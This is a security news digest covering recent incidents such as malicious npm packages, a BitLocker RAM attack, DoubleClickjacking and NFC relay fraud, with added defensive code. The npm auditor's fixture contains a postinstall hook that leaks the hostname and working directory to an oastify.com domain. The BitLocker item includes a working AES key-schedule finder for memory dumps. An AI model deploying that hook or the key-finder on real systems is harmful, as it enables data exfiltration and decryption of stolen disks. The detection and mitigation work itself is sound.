Protecting Web-based Work: Connecting People, Web Browsers and Security

Web browsers are where most modern work happens, and they have become a primary attack surface as organizations shift to hybrid work. Security controls have lagged behind that shift, and the result is breaches and financial losses. A high proportion of workplaces report browser-based attacks, which is the argument for frameworks such as SASE and for enterprise browsers that contain the risk from personal and unmanaged devices. Zero-trust architecture and ongoing employee training round out the proactive measures the piece recommends for protecting sensitive data and building a resilient security posture.

Protecting Web-Based Work: Connecting People, Web Browsers and Security

Over 4,000 Backdoors Hijacked by Registering Expired Domains

Researchers at WatchTowr Labs took control of more than 4,000 backdoors by registering the expired domains those backdoors call back to, then sinkholed the traffic so nobody else could pick up the abandoned infrastructure and reuse the compromised hosts. The beaconing systems included government and educational institutions in several countries. Control of the hijacked domains has been handed to The Shadowserver Foundation for ongoing monitoring.

Over 4,000 backdoors hijacked by registering expired domains

SonicWall Urges Admins to Patch Exploitable SSLVPN Bug Immediately

SonicWall is urging immediate firmware updates for a high-severity SSLVPN authentication bypass (CVE-2024-53704, CVSS 8.2) affecting certain firewall models; patches are available and the flaw is considered exploitable. The same advisory covers a weak PRNG in SSL VPN authentication tokens, an SSRF in the SSH management interface, and a privilege escalation in the cloud editions. Administrators should upgrade to the SonicOS versions the advisory specifies and, until they do, restrict SSLVPN and SSH management access to trusted sources.

SonicWall urges admins to patch exploitable SSLVPN bug immediately

Telegram Hands over Data on Thousands of Users to US Law Enforcement

Telegram has shared data on 2,253 users with U.S. law enforcement following a policy shift, fulfilling 900 requests in 2024 compared with only 14 before the change. The shift came after pressure from authorities and the arrest of founder Pavel Durov on cybercrime-related charges. Telegram now cooperates on a range of crimes beyond terrorism, and some cybercriminals have said they are considering leaving the platform as a result. An updated transparency report is expected in April 2025.

Telegram hands over data on thousands of users to US law enforcement

New PhishWP Plugin Enables Sophisticated Payment Page Scams

New PhishWP plugin enables creation of fake payment pages, allowing cybercriminals to steal sensitive data. It mimics trusted services like Stripe, collecting credit card info and OTPs, sending this data to attackers via Telegram. PhishWP can compromise existing WordPress sites or create fraudulent ones, making scams difficult to detect. It features customizable checkouts, data collection capabilities, and real-time data transmission, posing a significant security threat. Experts recommend using advanced phishing protection tools to combat such scams.

New PhishWP Plugin Enables Sophisticated Payment Page Scams

Weaponizing OAST: How Malicious Packages Exploit npm, PyPI, …

Malicious packages in npm, PyPI, and RubyGems exploit Out-of-Band Application Security Testing (OAST) techniques for data exfiltration. Threat actors leverage services like oastify.com to stealthily extract sensitive data and probe developer environments. Examples include a spoofed npm package (adobe-dcapi-web) designed to bypass detection, a typosquatted PyPI package (monoliht) for silent metadata collection, and various RubyGems targeting user information via DNS queries. These techniques pose significant risks, emphasizing the need for enhanced security measures in software supply chains.
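The install-hook pattern described above is easy to audit for before a package is installed. The following is an added example, not code from the article or from any of the packages it names: it parses an npm `package.json`, looks at the lifecycle scripts npm runs automatically, and flags commands that reference the public OAST callback domains (the Burp Collaborator and interactsh defaults) or that build long encoded DNS labels. The two manifests are constructed for the demonstration and the package names in them are made up.

```javascript
// Added example (not code from the article or any of the packages it names):
// audit an npm package.json for install-time hooks that talk to OAST
// callback domains or smuggle data through DNS labels.
const OAST_DOMAINS = [
  "oastify.com", "burpcollaborator.net",                     // Burp Collaborator
  "interact.sh", "oast.pro", "oast.live", "oast.site",
  "oast.online", "oast.fun", "oast.me",                       // interactsh defaults
];

// Scripts npm runs on its own during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Shell and Node idioms that resolve a name or make a request from a hook.
const NETWORK_IDIOM =
  /\b(curl|wget|nslookup|dig|host)\b|require\(['"](dns|https?|net)['"]\)|\bfetch\(/;

// Exfil tools pack hostname, username, cwd etc. into long DNS labels so the
// data rides out on a recursive lookup even when egress HTTP is blocked.
const ENCODED_LABEL = /(?:[a-z0-9]{16,}\.)+[a-z0-9.-]+/i;

function findOastReferences(text) {
  const lower = text.toLowerCase();
  return OAST_DOMAINS.filter((domain) => lower.includes(domain));
}

function auditPackageManifest(manifestJson) {
  const manifest = JSON.parse(manifestJson);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const oastDomains = findOastReferences(command);
    const networkIdiom = NETWORK_IDIOM.test(command);
    const encodedDnsLabel = ENCODED_LABEL.test(command);
    const severity = oastDomains.length ? "high"
      : networkIdiom || encodedDnsLabel ? "medium" : "low";
    findings.push({ hook, command, oastDomains, networkIdiom, encodedDnsLabel, severity });
  }
  return { name: manifest.name, version: manifest.version, findings };
}

// Constructed manifests for demonstration; the package names are made up.
const SUSPICIOUS_MANIFEST = JSON.stringify({
  name: "adobe-dcapi-web-lookalike",
  version: "1.0.3",
  scripts: {
    postinstall:
      "node -e \"const h=require('os').hostname();" +
      "require('dns').resolve(h+'.'+Buffer.from(process.cwd()).toString('hex')+" +
      "'.cjkl9s0a1b2c3d4e5f6g7h.oastify.com',()=>{})\"",
  },
});
const CLEAN_MANIFEST = JSON.stringify({
  name: "harmless-lib",
  version: "2.1.0",
  scripts: { test: "node test.js", prepare: "node build.js" },
});

for (const manifest of [SUSPICIOUS_MANIFEST, CLEAN_MANIFEST]) {
  const report = auditPackageManifest(manifest);
  console.log(report.name, report.findings.map((f) => `${f.hook}:${f.severity}`).join(", "));
}
```

Any lifecycle hook at all is worth a look, which is why a clean `prepare` script still appears as a low-severity finding; a `high` finding on `postinstall` is the case the article describes, and the domain list should be extended with whatever OAST or sinkhole domains your own tooling uses.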

Weaponizing OAST: How Malicious Packages Exploit npm, PyPI, …

Breaking Encryption: How to Prepare for Tomorrow’s Quantum Risk Today

Quantum computing threatens current encryption methods, risking sensitive data security. Organizations must prepare now by upgrading encryption to new post-quantum standards. Key steps include assessing exposure, adopting new encryption practices, remaining adaptable to evolving standards, and increasing awareness of quantum risks. This proactive approach helps safeguard data against future quantum capabilities.

Breaking Encryption: How To Prepare For Tomorrow's Quantum Risk Today

AI-generated Phishing Emails Are Getting Very Good at Targeting Executives

AI-generated phishing emails are increasingly targeting corporate executives. Companies like Beazley and eBay report a rise in hyper-personalized scams using personal details gathered via AI analysis. Experts highlight that AI enables hackers to craft convincing phishing emails that bypass security measures. Phishing is the starting point for over 90% of cyberattacks, with the global cost of data breaches rising. AI's role in identifying vulnerabilities enhances the sophistication of these scams, making them more difficult to detect.

AI-generated phishing emails are getting very good at targeting executives

Windows 11 BitLocker Encryption Bypassed to Extract Volume Encryption Keys

Researchers demonstrated a physical-access attack on Windows 11 BitLocker that recovers the Full Volume Encryption Key (FVEK) from RAM. It is a memory-capture attack rather than a break of the cipher: while a volume is unlocked its key must be resident in memory, so the attacker preserves RAM contents through a forced restart (keeping the DRAM powered is one of the techniques used), boots a prepared USB image, dumps memory, and searches the dump for key material. Secure Boot is meant to stop untrusted media from booting, but known bypasses exist. Residual keys can remain in memory despite Microsoft's mitigations, which is the familiar lesson that disk encryption does not protect a machine an attacker can handle while it is powered on or freshly shut down. The practical countermeasures are hardware and physical: a TPM-only configuration loads the key before any user interaction, so requiring pre-boot authentication (TPM plus PIN) means the FVEK is not in RAM until a secret is entered, and organizations should tighten physical access controls around devices that hold sensitive data.
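The "search the dump for key material" step works because an AES key schedule has a recognisable structure. The block below is an added illustration, not the researchers' tooling: it derives the AES S-box, implements the FIPS-197 key expansion for AES-128, and scans a byte image for any 16-byte window whose following 160 bytes are exactly the round keys that window would expand to, the approach used by tools such as aeskeyfind. The "memory image" is constructed: pseudo-random filler with one schedule planted at a known offset using the FIPS-197 Appendix A.1 test key. BitLocker's default XTS-AES-128 mode keeps two 128-bit keys in the FVEK, each of which would show up as its own schedule; AES-256 needs the 240-byte expansion, which is omitted here.

```javascript
// Added example (not the researchers' tooling): find AES-128 keys in a RAM
// image by recognising their expanded key schedule, the technique behind
// tools such as aeskeyfind. Whatever else an OS does with a volume key, the
// 176-byte schedule has to sit in memory while the volume is in use, and its
// structure is recognisable without knowing the key in advance.

// Build the AES S-box from GF(2^8) arithmetic rather than a 256-entry table.
function gfMul(a, b) {
  let product = 0;
  for (let i = 0; i < 8; i++) {
    if (b & 1) product ^= a;
    const carry = a & 0x80;
    a = (a << 1) & 0xff;
    if (carry) a ^= 0x1b;          // reduce by x^8 + x^4 + x^3 + x + 1
    b >>= 1;
  }
  return product;
}
const SBOX = new Uint8Array(256);
for (let x = 0; x < 256; x++) {
  let inv = 0;
  if (x) for (let y = 1; y < 256; y++) if (gfMul(x, y) === 1) { inv = y; break; }
  let s = inv;
  for (let i = 1; i <= 4; i++) s ^= ((inv << i) | (inv >> (8 - i))) & 0xff;
  SBOX[x] = s ^ 0x63;              // affine transform of the inverse
}
const RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36];

// FIPS-197 key expansion for a 16-byte key; returns the 176-byte schedule.
function expandKey128(key) {
  const w = new Uint8Array(176);
  w.set(key.subarray(0, 16));
  for (let i = 16; i < 176; i += 4) {
    let t = [w[i - 4], w[i - 3], w[i - 2], w[i - 1]];
    if (i % 16 === 0) {            // RotWord, SubWord, then XOR the round constant
      t = [SBOX[t[1]] ^ RCON[i / 16 - 1], SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]];
    }
    for (let j = 0; j < 4; j++) w[i + j] = w[i - 16 + j] ^ t[j];
  }
  return w;
}

// Treat every 16-byte window of the image as a candidate key and accept it
// when the bytes that follow equal the round keys expansion predicts.
function findAes128Keys(image, rounds = 10) {
  const hits = [];
  for (let off = 0; off + 176 <= image.length; off++) {
    const sched = expandKey128(image.subarray(off, off + 16));
    let matches = true;
    for (let k = 16; matches && k < 16 + 16 * rounds; k++) matches = sched[k] === image[off + k];
    if (matches) hits.push({ offset: off, key: Buffer.from(sched.subarray(0, 16)).toString("hex") });
  }
  return hits;
}

// Constructed "memory image": pseudo-random filler with one genuine schedule
// planted at a known offset, using the FIPS-197 Appendix A.1 key.
const FIPS197_KEY = Buffer.from("2b7e151628aed2a6abf7158809cf4f3c", "hex");
function buildSampleImage(size = 8192, keyOffset = 1234) {
  const image = new Uint8Array(size);
  let seed = 0x12345678;
  for (let i = 0; i < size; i++) {
    seed = (Math.imul(seed, 1103515245) + 12345) >>> 0;   // deterministic LCG filler
    image[i] = seed >>> 24;
  }
  image.set(expandKey128(FIPS197_KEY), keyOffset);
  return image;
}

console.log(findAes128Keys(buildSampleImage()));
```

Checking all ten round keys makes a false positive on random memory essentially impossible; a real tool would check the first round key cheaply before expanding the rest, and would also scan for the partially overwritten schedules that the "residual keys" remark refers to.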

Windows 11 BitLocker Encryption Bypassed To Extract Volume Encryption Keys

New DoubleClickjacking Attack Exploits Double-clicks to Hijack Accounts

A new "DoubleClickjacking" technique hijacks accounts by abusing the timing of a double-click, and it sidesteps the frame-based defences (X-Frame-Options, CSP frame-ancestors) that stop classic clickjacking. The attacker's page asks the victim to double-click; the first click lands on the attacker's window, which closes or swaps itself out in the gap before the second click, so that click lands on a sensitive button (an OAuth authorization prompt, for example) in the legitimate site's window sitting underneath. No iframe is involved, so frame-busting never triggers. Major platforms including Shopify and Slack were found to be exposed. Suggested protections are client-side JavaScript that keeps sensitive buttons disabled until the page itself observes a mouse movement or key press, and an HTTP header that would let browsers suppress clicks arriving immediately after a rapid window switch.
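The JavaScript mitigation mentioned above, as an added example rather than code from the write-up or from any affected site: a sensitive button stays disarmed until this window has seen a genuine user gesture, and never within the first moments after the window gained focus. The second click of a DoubleClickjacking sequence arrives in a window the victim never moved the mouse in, milliseconds after it was focused, so it fails both checks. The gate logic is kept free of DOM dependencies so it can be exercised outside a browser; the browser wiring, the `button[data-sensitive]` selector and the 500 ms threshold are assumptions.

```javascript
// Added example (not from the write-up): keep a sensitive button disarmed
// until this window has seen a real user gesture, and never within the first
// moments after the window gained focus.
function createClickGate({ minFocusAgeMs = 500 } = {}) {
  let focusedAt = -Infinity;   // when this window last gained focus
  let gestureAt = -Infinity;   // last mousemove/keydown/touchstart seen here
  const isArmed = (now) => gestureAt > focusedAt && now - focusedAt >= minFocusAgeMs;
  return {
    onFocus(now) { focusedAt = now; gestureAt = -Infinity; },  // every focus change disarms
    onGesture(now) { gestureAt = now; },
    isArmed,
    handleClick(now) { return isArmed(now); },  // true = honour the click
  };
}

// Browser wiring (assumed selector and attribute names): disable the button
// while disarmed and swallow any click that still gets through.
function protectButton(button, gate = createClickGate(), clock = () => performance.now()) {
  const refresh = () => { button.disabled = !gate.isArmed(clock()); };
  window.addEventListener("focus", () => { gate.onFocus(clock()); refresh(); });
  for (const type of ["mousemove", "keydown", "touchstart"]) {
    window.addEventListener(type, () => { gate.onGesture(clock()); refresh(); }, { passive: true });
  }
  button.addEventListener("click", (event) => {
    if (!gate.handleClick(clock())) { event.preventDefault(); event.stopImmediatePropagation(); }
  }, true);
  setInterval(refresh, 100);   // re-enable once the focus-age threshold passes
  gate.onFocus(clock());
  refresh();
}

if (typeof document !== "undefined") {
  const button = document.querySelector("button[data-sensitive]");
  if (button) protectButton(button);
}
```

The capture-phase click listener matters: it runs before the site's own handler on the same element, so a click that slips through while the button is momentarily enabled is still dropped. Resetting the gesture on every focus event is what defeats the attack's window swap; the focus-age delay covers the case where a stray mousemove arrives in the same instant as the second click.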

New DoubleClickjacking attack exploits double-clicks to hijack accounts

SysBumps – New Kernel Break Attack Bypassing macOS Systems Security

Researchers from Korea University exposed “SysBumps,” an attack on macOS systems using Apple Silicon. It exploits speculative execution vulnerabilities to bypass Kernel Address Space Layout Randomization (KASLR), a key security feature. By manipulating system calls and using the Translation Lookaside Buffer (TLB) as a side channel, attackers can accurately map kernel memory, achieving over 96% success in locating the kernel base address. This undermines existing kernel isolation techniques. Apple is investigating, and proposed countermeasures include TLB partitioning and code reordering. Users are advised to keep systems updated for future fixes.

https://cybersecuritynews.com/sysbumps/

It’s Only a Matter of Time Before LLMs Jump Start Supply-chain Attacks

LLMs may enhance supply-chain attacks by aiding social engineering, particularly spear phishing. Criminals can exploit existing LLMs rather than creating their own, making attacks more feasible. In 2025, targeted scams based on personal data could rise significantly, as attackers craft convincing messages. Previous incidents, like the Change Healthcare ransomware attack, underscore the potential impacts. Security tools are emerging, but users must remain vigilant against phishing and voice cloning scams. Effective prevention includes careful scrutiny of emails and communications.

https://www.theregister.com/2024/12/29/llm_supply_chain_attacks/

Customer Data From 800,000 Electric Cars and Owners Exposed Online

Data from 800,000 electric cars owned by Volkswagen, Seat, Audi, and Skoda was exposed online due to misconfigured Amazon cloud storage. The leak revealed detailed vehicle info, including precise location data, notable for its accuracy. Ethical hackers informed Volkswagen's software company, Cariad, of the vulnerability. Although access required technical expertise, some sensitive data was linked to high-profile individuals, raising privacy concerns. Cariad claims the issue was quickly resolved, with no evidence of data misuse by others found.

Customer data from 800,000 electric cars and owners exposed online

Cyberhaven Chrome Extension Compromised in Targeted Attack

The Cyberhaven Chrome extension was compromised in a targeted attack on December 24, 2024. The attacker gained access to an employee account and used it to publish a malicious version (24.10.4) to the Chrome Web Store. It was detected and removed within 60 minutes on December 25, but users who received the malicious build were exposed to exfiltration of sensitive data. Recommendations: update to version 24.10.5 or later, rotate passwords, revoke API tokens, and review logs for suspicious activity. The Firefox and Edge extensions were unaffected. Cyberhaven has engaged federal law enforcement and Mandiant to investigate.

Cyberhaven Chrome Extension Compromised in Targeted Attack

Ghost Tap: New Cash-out Tactic with Nfc Relay

Fraudsters adopt “Ghost Tap”, relaying NFC traffic for cash-outs using stolen card details linked to mobile payments. This technique, leveraging NFCGate, enables cybercriminals to perform transactions anonymously at retail locations, enhancing scalability. Detection challenges arise due to transaction patterns and lack of device presence at POS terminals, necessitating improved anti-fraud measures in financial institutions to combat this emerging threat.
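One of the transaction-pattern signals the summary alludes to is that a relayed token can be tapped at terminals no single phone could have reached in the time between taps. The following is an added example of that check, not code from the report or from any financial institution: it groups constructed tap transactions by payment token and raises an alert when consecutive taps imply a travel speed no real cardholder could manage. The terminal coordinates, thresholds and transaction records are all constructed for the demonstration.

```javascript
// Added example (not from the report): flag a tokenised card that is tapped
// at terminals too far apart for one physical phone to have been present.
// With Ghost Tap the NFC session is relayed over the network to a mule, so a
// single token can appear at terminals in different cities minutes apart.
function haversineKm(a, b) {
  const rad = (deg) => (deg * Math.PI) / 180;
  const dLat = rad(b.lat - a.lat), dLon = rad(b.lon - a.lon);
  const h = Math.sin(dLat / 2) ** 2 +
            Math.cos(rad(a.lat)) * Math.cos(rad(b.lat)) * Math.sin(dLon / 2) ** 2;
  return 2 * 6371 * Math.asin(Math.sqrt(h));
}

// txns: { id, token, terminalId, ts (ms since epoch), lat, lon }
// maxKmh: fastest plausible travel between consecutive taps (assumed threshold);
// minKm: ignore short hops where terminal geocoding noise dominates.
function findImpossibleTravel(txns, { maxKmh = 900, minKm = 50 } = {}) {
  const byToken = new Map();
  for (const t of txns) {
    if (!byToken.has(t.token)) byToken.set(t.token, []);
    byToken.get(t.token).push(t);
  }
  const alerts = [];
  for (const [token, list] of byToken) {
    list.sort((x, y) => x.ts - y.ts);
    for (let i = 1; i < list.length; i++) {
      const prev = list[i - 1], cur = list[i];
      const km = haversineKm(prev, cur);
      const hours = Math.max((cur.ts - prev.ts) / 3.6e6, 1 / 3600);   // floor at one second
      const kmh = km / hours;
      if (km >= minKm && kmh > maxKmh) {
        alerts.push({ token, from: prev.id, to: cur.id, km: Math.round(km), kmh: Math.round(kmh) });
      }
    }
  }
  return alerts;
}

// Constructed transaction feed (coordinates are city centres, not real terminals).
const SAMPLE_TXNS = [
  { id: "t1", token: "tok-A", terminalId: "FRA-0017", ts: Date.parse("2025-01-06T12:00:00Z"), lat: 50.11, lon: 8.68 },   // Frankfurt
  { id: "t2", token: "tok-A", terminalId: "MUC-0442", ts: Date.parse("2025-01-06T12:05:00Z"), lat: 48.14, lon: 11.58 },  // Munich, 5 min later
  { id: "t3", token: "tok-A", terminalId: "MUC-0443", ts: Date.parse("2025-01-06T12:20:00Z"), lat: 48.14, lon: 11.58 },  // Munich again
  { id: "t4", token: "tok-B", terminalId: "BER-0090", ts: Date.parse("2025-01-06T12:00:00Z"), lat: 52.52, lon: 13.40 },  // Berlin
  { id: "t5", token: "tok-B", terminalId: "BER-0091", ts: Date.parse("2025-01-06T12:30:00Z"), lat: 52.53, lon: 13.41 },  // Berlin, 30 min later
];

console.log(findImpossibleTravel(SAMPLE_TXNS));
```

Velocity alone will not catch a relay that stays within one city, which is why the report calls for combining it with device-presence signals from the wallet (whether the enrolled handset was actually near the terminal) rather than relying on transaction geography by itself.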

Ghost Tap: New cash-out tactic with NFC Relay
